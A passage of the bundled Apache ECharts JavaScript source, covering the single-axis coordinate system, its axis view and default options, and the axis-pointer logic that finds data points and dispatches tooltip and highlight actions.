module:echarts/coord/single/Single.\n     * @type {Function}\n     */\n    toLocalCoord: null\n\n};\n\ninherits(SingleAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Single coordinates system.\n */\n\n/**\n * Create a single coordinates system.\n *\n * @param {module:echarts/coord/single/AxisModel} axisModel\n * @param {module:echarts/model/Global} ecModel\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction Single(axisModel, ecModel, api) {\n\n    /**\n     * @type {string}\n     * @readOnly\n     */\n    this.dimension = 'single';\n\n    /**\n     * Add it just for draw tooltip.\n     *\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    this.dimensions = ['single'];\n\n    /**\n     * @private\n     * @type {module:echarts/coord/single/SingleAxis}.\n     */\n    this._axis = null;\n\n    /**\n     * @private\n     * @type {module:zrender/core/BoundingRect}\n     */\n    this._rect;\n\n    this._init(axisModel, ecModel, api);\n\n    /**\n     * @type {module:echarts/coord/single/AxisModel}\n     */\n    this.model = axisModel;\n}\n\nSingle.prototype = {\n\n    type: 'singleAxis',\n\n    axisPointerEnabled: true,\n\n    constructor: Single,\n\n    /**\n     * Initialize single coordinate system.\n     *\n     * @param  {module:echarts/coord/single/AxisModel} axisModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @private\n     */\n    _init: function (axisModel, ecModel, api) {\n\n        var dim = this.dimension;\n\n        var axis = new SingleAxis(\n            dim,\n            createScaleByModel(axisModel),\n            [0, 0],\n            axisModel.get('type'),\n            axisModel.get('position')\n        );\n\n        var isCategory = axis.type === 'category';\n        axis.onBand = isCategory && axisModel.get('boundaryGap');\n        axis.inverse = axisModel.get('inverse');\n        axis.orient = axisModel.get('orient');\n\n        axisModel.axis = axis;\n        axis.model = axisModel;\n        axis.coordinateSystem = this;\n        this._axis = axis;\n    },\n\n    /**\n     * Update axis scale after data processed\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    update: function (ecModel, api) {\n        ecModel.eachSeries(function (seriesModel) {\n            if (seriesModel.coordinateSystem === this) {\n                var data = seriesModel.getData();\n                each$1(data.mapDimension(this.dimension, true), function (dim) {\n                    this._axis.scale.unionExtentFromData(data, dim);\n                }, this);\n                niceScaleExtent(this._axis.scale, this._axis.model);\n            }\n        }, this);\n    },\n\n    /**\n     * Resize the single coordinate system.\n     *\n     * @param  {module:echarts/coord/single/AxisModel} axisModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    resize: function (axisModel, api) {\n        this._rect = getLayoutRect(\n            {\n                left: axisModel.get('left'),\n                top: axisModel.get('top'),\n                right: axisModel.get('right'),\n                bottom: axisModel.get('bottom'),\n                width: axisModel.get('width'),\n                height: axisModel.get('height')\n            },\n            {\n                width: api.getWidth(),\n                height: api.getHeight()\n            }\n        );\n\n        this._adjustAxis();\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getRect: function () {\n        return this._rect;\n    },\n\n    /**\n     * @private\n     */\n    _adjustAxis: function () {\n\n        var rect = this._rect;\n        var axis = this._axis;\n\n        var isHorizontal = axis.isHorizontal();\n        var extent = isHorizontal ? [0, rect.width] : [0, rect.height];\n        var idx = axis.reverse ? 1 : 0;\n\n        axis.setExtent(extent[idx], extent[1 - idx]);\n\n        this._updateAxisTransform(axis, isHorizontal ? rect.x : rect.y);\n\n    },\n\n    /**\n     * @param  {module:echarts/coord/single/SingleAxis} axis\n     * @param  {number} coordBase\n     */\n    _updateAxisTransform: function (axis, coordBase) {\n\n        var axisExtent = axis.getExtent();\n        var extentSum = axisExtent[0] + axisExtent[1];\n        var isHorizontal = axis.isHorizontal();\n\n        axis.toGlobalCoord = isHorizontal\n            ? function (coord) {\n                return coord + coordBase;\n            }\n            : function (coord) {\n                return extentSum - coord + coordBase;\n            };\n\n        axis.toLocalCoord = isHorizontal\n            ? function (coord) {\n                return coord - coordBase;\n            }\n            : function (coord) {\n                return extentSum - coord + coordBase;\n            };\n    },\n\n    /**\n     * Get axis.\n     *\n     * @return {module:echarts/coord/single/SingleAxis}\n     */\n    getAxis: function () {\n        return this._axis;\n    },\n\n    /**\n     * Get axis, add it just for draw tooltip.\n     *\n     * @return {[type]} [description]\n     */\n    getBaseAxis: function () {\n        return this._axis;\n    },\n\n    /**\n     * @return {Array.<module:echarts/coord/Axis>}\n     */\n    getAxes: function () {\n        return [this._axis];\n    },\n\n    /**\n     * @return {Object} {baseAxes: [], otherAxes: []}\n     */\n    getTooltipAxes: function () {\n        return {baseAxes: [this.getAxis()]};\n    },\n\n    /**\n     * If contain point.\n     *\n     * @param  {Array.<number>} point\n     * @return {boolean}\n     */\n    containPoint: function (point) {\n        var rect = this.getRect();\n        var axis = this.getAxis();\n        var orient = axis.orient;\n        if (orient === 'horizontal') {\n            return axis.contain(axis.toLocalCoord(point[0]))\n            && (point[1] >= rect.y && point[1] <= (rect.y + rect.height));\n        }\n        else {\n            return axis.contain(axis.toLocalCoord(point[1]))\n            && (point[0] >= rect.y && point[0] <= (rect.y + rect.height));\n        }\n    },\n\n    /**\n     * @param {Array.<number>} point\n     * @return {Array.<number>}\n     */\n    pointToData: function (point) {\n        var axis = this.getAxis();\n        return [axis.coordToData(axis.toLocalCoord(\n            point[axis.orient === 'horizontal' ? 0 : 1]\n        ))];\n    },\n\n    /**\n     * Convert the series data to concrete point.\n     *\n     * @param  {number|Array.<number>} val\n     * @return {Array.<number>}\n     */\n    dataToPoint: function (val) {\n        var axis = this.getAxis();\n        var rect = this.getRect();\n        var pt = [];\n        var idx = axis.orient === 'horizontal' ? 0 : 1;\n\n        if (val instanceof Array) {\n            val = val[0];\n        }\n\n        pt[idx] = axis.toGlobalCoord(axis.dataToCoord(+val));\n        pt[1 - idx] = idx === 0 ? (rect.y + rect.height / 2) : (rect.x + rect.width / 2);\n        return pt;\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Single coordinate system creator.\n */\n\n/**\n * Create single coordinate system and inject it into seriesModel.\n *\n * @param {module:echarts/model/Global} ecModel\n * @param {module:echarts/ExtensionAPI} api\n * @return {Array.<module:echarts/coord/single/Single>}\n */\nfunction create$3(ecModel, api) {\n    var singles = [];\n\n    ecModel.eachComponent('singleAxis', function (axisModel, idx) {\n\n        var single = new Single(axisModel, ecModel, api);\n        single.name = 'single_' + idx;\n        single.resize(axisModel, api);\n        axisModel.coordinateSystem = single;\n        singles.push(single);\n\n    });\n\n    ecModel.eachSeries(function (seriesModel) {\n        if (seriesModel.get('coordinateSystem') === 'singleAxis') {\n            var singleAxisModel = ecModel.queryComponents({\n                mainType: 'singleAxis',\n                index: seriesModel.get('singleAxisIndex'),\n                id: seriesModel.get('singleAxisId')\n            })[0];\n            seriesModel.coordinateSystem = singleAxisModel && singleAxisModel.coordinateSystem;\n        }\n    });\n\n    return singles;\n}\n\nCoordinateSystemManager.register('single', {\n    create: create$3,\n    dimensions: Single.prototype.dimensions\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {Object} opt {labelInside}\n * @return {Object} {\n *  position, rotation, labelDirection, labelOffset,\n *  tickDirection, labelRotate, z2\n * }\n */\nfunction layout$2(axisModel, opt) {\n    opt = opt || {};\n    var single = axisModel.coordinateSystem;\n    var axis = axisModel.axis;\n    var layout = {};\n\n    var axisPosition = axis.position;\n    var orient = axis.orient;\n\n    var rect = single.getRect();\n    var rectBound = [rect.x, rect.x + rect.width, rect.y, rect.y + rect.height];\n\n    var positionMap = {\n        horizontal: {top: rectBound[2], bottom: rectBound[3]},\n        vertical: {left: rectBound[0], right: rectBound[1]}\n    };\n\n    layout.position = [\n        orient === 'vertical'\n            ? positionMap.vertical[axisPosition]\n            : rectBound[0],\n        orient === 'horizontal'\n            ? positionMap.horizontal[axisPosition]\n            : rectBound[3]\n    ];\n\n    var r = {horizontal: 0, vertical: 1};\n    layout.rotation = Math.PI / 2 * r[orient];\n\n    var directionMap = {top: -1, bottom: 1, right: 1, left: -1};\n\n    layout.labelDirection = layout.tickDirection =\n        layout.nameDirection = directionMap[axisPosition];\n\n    if (axisModel.get('axisTick.inside')) {\n        layout.tickDirection = -layout.tickDirection;\n    }\n\n    if (retrieve(opt.labelInside, axisModel.get('axisLabel.inside'))) {\n        layout.labelDirection = -layout.labelDirection;\n    }\n\n    var labelRotation = opt.rotate;\n    labelRotation == null && (labelRotation = axisModel.get('axisLabel.rotate'));\n    layout.labelRotation = axisPosition === 'top' ? -labelRotation : labelRotation;\n\n    layout.z2 = 1;\n\n    return layout;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar axisBuilderAttrs$2 = [\n    'axisLine', 'axisTickLabel', 'axisName'\n];\n\nvar selfBuilderAttrs$1 = ['splitArea', 'splitLine'];\n\nvar SingleAxisView = AxisView.extend({\n\n    type: 'singleAxis',\n\n    axisPointerClass: 'SingleAxisPointer',\n\n    render: function (axisModel, ecModel, api, payload) {\n\n        var group = this.group;\n\n        group.removeAll();\n\n        var oldAxisGroup = this._axisGroup;\n        this._axisGroup = new Group();\n\n        var layout = layout$2(axisModel);\n\n        var axisBuilder = new AxisBuilder(axisModel, layout);\n\n        each$1(axisBuilderAttrs$2, axisBuilder.add, axisBuilder);\n\n        group.add(this._axisGroup);\n        group.add(axisBuilder.getGroup());\n\n        each$1(selfBuilderAttrs$1, function (name) {\n            if (axisModel.get(name + '.show')) {\n                this['_' + name](axisModel);\n            }\n        }, this);\n\n        groupTransition(oldAxisGroup, this._axisGroup, axisModel);\n\n        SingleAxisView.superCall(this, 'render', axisModel, ecModel, api, payload);\n    },\n\n    remove: function () {\n        rectCoordAxisHandleRemove(this);\n    },\n\n    _splitLine: function (axisModel) {\n        var axis = axisModel.axis;\n\n        if (axis.scale.isBlank()) {\n            return;\n        }\n\n        var splitLineModel = axisModel.getModel('splitLine');\n        var lineStyleModel = splitLineModel.getModel('lineStyle');\n        var lineWidth = lineStyleModel.get('width');\n        var lineColors = lineStyleModel.get('color');\n\n        lineColors = lineColors instanceof Array ? lineColors : [lineColors];\n\n        var gridRect = axisModel.coordinateSystem.getRect();\n        var isHorizontal = axis.isHorizontal();\n\n        var splitLines = [];\n        var lineCount = 0;\n\n        var ticksCoords = axis.getTicksCoords({\n            tickModel: splitLineModel\n        });\n\n        var p1 = [];\n        var p2 = [];\n\n        for (var i = 0; i < ticksCoords.length; ++i) {\n            var tickCoord = axis.toGlobalCoord(ticksCoords[i].coord);\n            if (isHorizontal) {\n                p1[0] = tickCoord;\n                p1[1] = gridRect.y;\n                p2[0] = tickCoord;\n                p2[1] = gridRect.y + gridRect.height;\n            }\n            else {\n                p1[0] = gridRect.x;\n                p1[1] = tickCoord;\n                p2[0] = gridRect.x + gridRect.width;\n                p2[1] = tickCoord;\n            }\n            var colorIndex = (lineCount++) % lineColors.length;\n            splitLines[colorIndex] = splitLines[colorIndex] || [];\n            splitLines[colorIndex].push(new Line({\n                subPixelOptimize: true,\n                shape: {\n                    x1: p1[0],\n                    y1: p1[1],\n                    x2: p2[0],\n                    y2: p2[1]\n                },\n                style: {\n                    lineWidth: lineWidth\n                },\n                silent: true\n            }));\n        }\n\n        for (var i = 0; i < splitLines.length; ++i) {\n            this.group.add(mergePath(splitLines[i], {\n                style: {\n                    stroke: lineColors[i % lineColors.length],\n                    lineDash: lineStyleModel.getLineDash(lineWidth),\n                    lineWidth: lineWidth\n                },\n                silent: true\n            }));\n        }\n    },\n\n    _splitArea: function (axisModel) {\n        rectCoordAxisBuildSplitArea(this, this._axisGroup, axisModel, axisModel);\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AxisModel$4 = ComponentModel.extend({\n\n    type: 'singleAxis',\n\n    layoutMode: 'box',\n\n    /**\n     * @type {module:echarts/coord/single/SingleAxis}\n     */\n    axis: null,\n\n    /**\n     * @type {module:echarts/coord/single/Single}\n     */\n    coordinateSystem: null,\n\n    /**\n     * @override\n     */\n    getCoordSysModel: function () {\n        return this;\n    }\n\n});\n\nvar defaultOption$2 = {\n\n    left: '5%',\n    top: '5%',\n    right: '5%',\n    bottom: '5%',\n\n    type: 'value',\n\n    position: 'bottom',\n\n    orient: 'horizontal',\n\n    axisLine: {\n        show: true,\n        lineStyle: {\n            width: 1,\n            type: 'solid'\n        }\n    },\n\n    // Single coordinate system and single axis is the,\n    // which is used as the parent tooltip model.\n    // same model, so we set default tooltip show as true.\n    tooltip: {\n        show: true\n    },\n\n    axisTick: {\n        show: true,\n        length: 6,\n        lineStyle: {\n            width: 1\n        }\n    },\n\n    axisLabel: {\n        show: true,\n        interval: 'auto'\n    },\n\n    splitLine: {\n        show: true,\n        lineStyle: {\n            type: 'dashed',\n            opacity: 0.2\n        }\n    }\n};\n\nfunction getAxisType$2(axisName, option) {\n    return option.type || (option.data ? 'category' : 'value');\n}\n\nmerge(AxisModel$4.prototype, axisModelCommonMixin);\n\naxisModelCreator('single', AxisModel$4, getAxisType$2, defaultOption$2);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {Object} finder contains {seriesIndex, dataIndex, dataIndexInside}\n * @param {module:echarts/model/Global} ecModel\n * @return {Object} {point: [x, y], el: ...} point Will not be null.\n */\nvar findPointFromSeries = function (finder, ecModel) {\n    var point = [];\n    var seriesIndex = finder.seriesIndex;\n    var seriesModel;\n    if (seriesIndex == null || !(\n        seriesModel = ecModel.getSeriesByIndex(seriesIndex)\n    )) {\n        return {point: []};\n    }\n\n    var data = seriesModel.getData();\n    var dataIndex = queryDataIndex(data, finder);\n    if (dataIndex == null || dataIndex < 0 || isArray(dataIndex)) {\n        return {point: []};\n    }\n\n    var el = data.getItemGraphicEl(dataIndex);\n    var coordSys = seriesModel.coordinateSystem;\n\n    if (seriesModel.getTooltipPosition) {\n        point = seriesModel.getTooltipPosition(dataIndex) || [];\n    }\n    else if (coordSys && coordSys.dataToPoint) {\n        point = coordSys.dataToPoint(\n            data.getValues(\n                map(coordSys.dimensions, function (dim) {\n                    return data.mapDimension(dim);\n                }), dataIndex, true\n            )\n        ) || [];\n    }\n    else if (el) {\n        // Use graphic bounding rect\n        var rect = el.getBoundingRect().clone();\n        rect.applyTransform(el.transform);\n        point = [\n            rect.x + rect.width / 2,\n            rect.y + rect.height / 2\n        ];\n    }\n\n    return {point: point, el: el};\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$14 = each$1;\nvar curry$3 = curry;\nvar inner$9 = makeInner();\n\n/**\n * Basic logic: check all axis, if they do not demand show/highlight,\n * then hide/downplay them.\n *\n * @param {Object} coordSysAxesInfo\n * @param {Object} payload\n * @param {string} [payload.currTrigger] 'click' | 'mousemove' | 'leave'\n * @param {Array.<number>} [payload.x] x and y, which are mandatory, specify a point to\n *              trigger axisPointer and tooltip.\n * @param {Array.<number>} [payload.y] x and y, which are mandatory, specify a point to\n *              trigger axisPointer and tooltip.\n * @param {Object} [payload.seriesIndex] finder, optional, restrict target axes.\n * @param {Object} [payload.dataIndex] finder, restrict target axes.\n * @param {Object} [payload.axesInfo] finder, restrict target axes.\n *        [{\n *          axisDim: 'x'|'y'|'angle'|...,\n *          axisIndex: ...,\n *          value: ...\n *        }, ...]\n * @param {Function} [payload.dispatchAction]\n * @param {Object} [payload.tooltipOption]\n * @param {Object|Array.<number>|Function} [payload.position] Tooltip position,\n *        which can be specified in dispatchAction\n * @param {module:echarts/model/Global} ecModel\n * @param {module:echarts/ExtensionAPI} api\n * @return {Object} content of event obj for echarts.connect.\n */\nvar axisTrigger = function (payload, ecModel, api) {\n    var currTrigger = payload.currTrigger;\n    var point = [payload.x, payload.y];\n    var finder = payload;\n    var dispatchAction = payload.dispatchAction || bind(api.dispatchAction, api);\n    var coordSysAxesInfo = ecModel.getComponent('axisPointer').coordSysAxesInfo;\n\n    // Pending\n    // See #6121. But we are not able to reproduce it yet.\n    if (!coordSysAxesInfo) {\n        return;\n    }\n\n    if (illegalPoint(point)) {\n        // Used in the default behavior of `connection`: use the sample seriesIndex\n        // and dataIndex. And also used in the tooltipView trigger.\n        point = findPointFromSeries({\n            seriesIndex: finder.seriesIndex,\n            // Do not use dataIndexInside from other ec instance.\n            // FIXME: auto detect it?\n            dataIndex: finder.dataIndex\n        }, ecModel).point;\n    }\n    var isIllegalPoint = illegalPoint(point);\n\n    // Axis and value can be specified when calling dispatchAction({type: 'updateAxisPointer'}).\n    // Notice: In this case, it is difficult to get the `point` (which is necessary to show\n    // tooltip, so if point is not given, we just use the point found by sample seriesIndex\n    // and dataIndex.\n    var inputAxesInfo = finder.axesInfo;\n\n    var axesInfo = coordSysAxesInfo.axesInfo;\n    var shouldHide = currTrigger === 'leave' || illegalPoint(point);\n    var outputFinder = {};\n\n    var showValueMap = {};\n    var dataByCoordSys = {list: [], map: {}};\n    var updaters = {\n        showPointer: curry$3(showPointer, showValueMap),\n        showTooltip: curry$3(showTooltip, dataByCoordSys)\n    };\n\n    // Process for triggered axes.\n    each$14(coordSysAxesInfo.coordSysMap, function (coordSys, coordSysKey) {\n        // If a point given, it must be contained by the coordinate system.\n        var coordSysContainsPoint = isIllegalPoint || coordSys.containPoint(point);\n\n        each$14(coordSysAxesInfo.coordSysAxesInfo[coordSysKey], function (axisInfo, key) {\n            var axis = axisInfo.axis;\n            var inputAxisInfo = findInputAxisInfo(inputAxesInfo, axisInfo);\n            // If no inputAxesInfo, no axis is restricted.\n            if (!shouldHide && coordSysContainsPoint && (!inputAxesInfo || inputAxisInfo)) {\n                var val = inputAxisInfo && inputAxisInfo.value;\n                if (val == null && !isIllegalPoint) {\n                    val = axis.pointToData(point);\n                }\n                val != null && processOnAxis(axisInfo, val, updaters, false, outputFinder);\n            }\n        });\n    });\n\n    // Process for linked axes.\n    var linkTriggers = {};\n    each$14(axesInfo, function (tarAxisInfo, tarKey) {\n        var linkGroup = tarAxisInfo.linkGroup;\n\n        // If axis has been triggered in the previous stage, it should not be triggered by link.\n        if (linkGroup && !showValueMap[tarKey]) {\n            each$14(linkGroup.axesInfo, function (srcAxisInfo, srcKey) {\n                var srcValItem = showValueMap[srcKey];\n                // If srcValItem exist, source axis is triggered, so link to target axis.\n                if (srcAxisInfo !== tarAxisInfo && srcValItem) {\n                    var val = srcValItem.value;\n                    linkGroup.mapper && (val = tarAxisInfo.axis.scale.parse(linkGroup.mapper(\n                        val, makeMapperParam(srcAxisInfo), makeMapperParam(tarAxisInfo)\n                    )));\n                    linkTriggers[tarAxisInfo.key] = val;\n                }\n            });\n        }\n    });\n    each$14(linkTriggers, function (val, tarKey) {\n        processOnAxis(axesInfo[tarKey], val, updaters, true, outputFinder);\n    });\n\n    updateModelActually(showValueMap, axesInfo, outputFinder);\n    dispatchTooltipActually(dataByCoordSys, point, payload, dispatchAction);\n    dispatchHighDownActually(axesInfo, dispatchAction, api);\n\n    return outputFinder;\n};\n\nfunction processOnAxis(axisInfo, newValue, updaters, dontSnap, outputFinder) {\n    var axis = axisInfo.axis;\n\n    if (axis.scale.isBlank() || !axis.containData(newValue)) {\n        return;\n    }\n\n    if (!axisInfo.involveSeries) {\n        updaters.showPointer(axisInfo, newValue);\n        return;\n    }\n\n    // Heavy calculation. So put it after axis.containData checking.\n    var payloadInfo = buildPayloadsBySeries(newValue, axisInfo);\n    var payloadBatch = payloadInfo.payloadBatch;\n    var snapToValue = payloadInfo.snapToValue;\n\n    // Fill content of event obj for echarts.connect.\n    // By defualt use the first involved series data as a sample to connect.\n    if (payloadBatch[0] && outputFinder.seriesIndex == null) {\n        extend(outputFinder, payloadBatch[0]);\n    }\n\n    // If no linkSource input, this process is for collecting link\n    // target, where snap should not be accepted.\n    if (!dontSnap && axisInfo.snap) {\n        if (axis.containData(snapToValue) && snapToValue != null) {\n            newValue = snapToValue;\n        }\n    }\n\n    updaters.showPointer(axisInfo, newValue, payloadBatch, outputFinder);\n    // Tooltip should always be snapToValue, otherwise there will be\n    // incorrect \"axis value ~ series value\" mapping displayed in tooltip.\n    updaters.showTooltip(axisInfo, payloadInfo, snapToValue);\n}\n\nfunction buildPayloadsBySeries(value, axisInfo) {\n    var axis = axisInfo.axis;\n    var dim = axis.dim;\n    var snapToValue = value;\n    var payloadBatch = [];\n    var minDist = Number.MAX_VALUE;\n    var minDiff = -1;\n\n    each$14(axisInfo.seriesModels, function (series, idx) {\n        var dataDim = series.getData().mapDimension(dim, true);\n        var seriesNestestValue;\n        var dataIndices;\n\n        if (series.getAxisTooltipData) {\n            var result = series.getAxisTooltipData(dataDim, value, axis);\n            dataIndices = result.dataIndices;\n            seriesNestestValue = result.nestestValue;\n        }\n        else {\n            dataIndices = series.getData().indicesOfNearest(\n                dataDim[0],\n                value,\n                // Add a threshold to avoid find the wrong dataIndex\n                // when data length is not same.\n                // false,\n                axis.type === 'category' ? 0.5 : null\n            );\n            if (!dataIndices.length) {\n                return;\n            }\n            seriesNestestValue = series.getData().get(dataDim[0], dataIndices[0]);\n        }\n\n        if (seriesNestestValue == null || !isFinite(seriesNestestValue)) {\n            return;\n        }\n\n        var diff = value - seriesNestestValue;\n        var dist = Math.abs(diff);\n        // Consider category case\n        if (dist <= minDist) {\n            if (dist < minDist || (diff >= 0 && minDiff < 0)) {\n                minDist = dist;\n                minDiff = diff;\n                snapToValue = seriesNestestValue;\n                payloadBatch.length = 0;\n            }\n            each$14(dataIndices, function (dataIndex) {\n                payloadBatch.push({\n                    seriesIndex: series.seriesIndex,\n                    dataIndexInside: dataIndex,\n                    dataIndex: series.getData().getRawIndex(dataIndex)\n                });\n            });\n        }\n    });\n\n    return {\n        payloadBatch: payloadBatch,\n        snapToValue: snapToValue\n    };\n}\n\nfunction showPointer(showValueMap, axisInfo, value, payloadBatch) {\n    showValueMap[axisInfo.key] = {value: value, payloadBatch: payloadBatch};\n}\n\nfunction showTooltip(dataByCoordSys, axisInfo, payloadInfo, value) {\n    var payloadBatch = payloadInfo.payloadBatch;\n    var axis = axisInfo.axis;\n    var axisModel = axis.model;\n    var axisPointerModel = axisInfo.axisPointerModel;\n\n    // If no data, do not create anything in dataByCoordSys,\n    // whose length will be used to judge whether dispatch action.\n    if (!axisInfo.triggerTooltip || !payloadBatch.length) {\n        return;\n    }\n\n    var coordSysModel = axisInfo.coordSys.model;\n    var coordSysKey = makeKey(coordSysModel);\n    var coordSysItem = dataByCoordSys.map[coordSysKey];\n    if (!coordSysItem) {\n        coordSysItem = dataByCoordSys.map[coordSysKey] = {\n            coordSysId: coordSysModel.id,\n            coordSysIndex: coordSysModel.componentIndex,\n            coordSysType: coordSysModel.type,\n            coordSysMainType: coordSysModel.mainType,\n            dataByAxis: []\n        };\n        dataByCoordSys.list.push(coordSysItem);\n    }\n\n    coordSysItem.dataByAxis.push({\n        axisDim: axis.dim,\n        axisIndex: axisModel.componentIndex,\n        axisType: axisModel.type,\n        axisId: axisModel.id,\n        value: value,\n        // Caustion: viewHelper.getValueLabel is actually on \"view stage\", which\n        // depends that all models have been updated. So it should not be performed\n        // here. Considering axisPointerModel used here is volatile, which is hard\n        // to be retrieve in TooltipView, we prepare parameters here.\n        valueLabelOpt: {\n            precision: axisPointerModel.get('label.precision'),\n            formatter: axisPointerModel.get('label.formatter')\n        },\n        seriesDataIndices: payloadBatch.slice()\n    });\n}\n\nfunction updateModelActually(showValueMap, axesInfo, outputFinder) {\n    var outputAxesInfo = outputFinder.axesInfo = [];\n    // Basic logic: If no 'show' required, 'hide' this axisPointer.\n    each$14(axesInfo, function (axisInfo, key) {\n        var option = axisInfo.axisPointerModel.option;\n        var valItem = showValueMap[key];\n\n        if (valItem) {\n            !axisInfo.useHandle && (option.status = 'show');\n            option.value = valItem.value;\n            // For label formatter param and highlight.\n            option.seriesDataIndices = (valItem.payloadBatch || []).slice();\n        }\n        // When always show (e.g., handle used), remain\n        // original value and status.\n        else {\n            // If hide, value still need to be set, consider\n            // click legend to toggle axis blank.\n            !axisInfo.useHandle && (option.status = 'hide');\n        }\n\n        // If status is 'hide', should be no info in payload.\n        option.status === 'show' && outputAxesInfo.push({\n            axisDim: axisInfo.axis.dim,\n            axisIndex: axisInfo.axis.model.componentIndex,\n            value: option.value\n        });\n    });\n}\n\nfunction dispatchTooltipActually(dataByCoordSys, point, payload, dispatchAction) {\n    // Basic logic: If no showTip required, hideTip will be dispatched.\n    if (illegalPoint(point) || !dataByCoordSys.list.length) {\n        dispatchAction({type: 'hideTip'});\n        return;\n    }\n\n    // In most case only one axis (or event one series is used). It is\n    // convinient to fetch payload.seriesIndex and payload.dataIndex\n    // dirtectly. So put the first seriesIndex and dataIndex of the first\n    // axis on the payload.\n    var sampleItem = ((dataByCoordSys.list[0].dataByAxis[0] || {}).seriesDataIndices || [])[0] || {};\n\n    dispatchAction({\n        type: 'showTip',\n        escapeConnect: true,\n        x: point[0],\n        y: point[1],\n        tooltipOption: payload.tooltipOption,\n        position: payload.position,\n        dataIndexInside: sampleItem.dataIndexInside,\n        dataIndex: sampleItem.dataIndex,\n        seriesIndex: sampleItem.seriesIndex,\n        dataByCoordSys: dataByCoordSys.list\n    });\n}\n\nfunction dispatchHighDownActually(axesInfo, dispatchAction, api) {\n    // FIXME\n    // highlight status modification shoule be a stage of main process?\n    // (Consider confilct (e.g., legend and axisPointer) and setOption)\n\n    var zr = api.getZr();\n    var highDownKey = 'axisPointerLastHighlights';\n    var lastHighlights = inner$9(zr)[highDownKey] || {};\n    var newHighlights = inner$9(zr)[highDownKey] = {};\n\n    // Update highlight/downplay status according to axisPointer model.\n    // Build hash map and remove duplicate incidentally.\n    each$14(axesInfo, function (axisInfo, key) {\n        var option = axisInfo.axisPointerModel.option;\n        option.status === 'show' && each$14(option.seriesDataIndices, function (batchItem) {\n            var key = batchItem.seriesIndex + ' | ' + batchItem.dataIndex;\n            newHighlights[key] = batchItem;\n        });\n    });\n\n    // 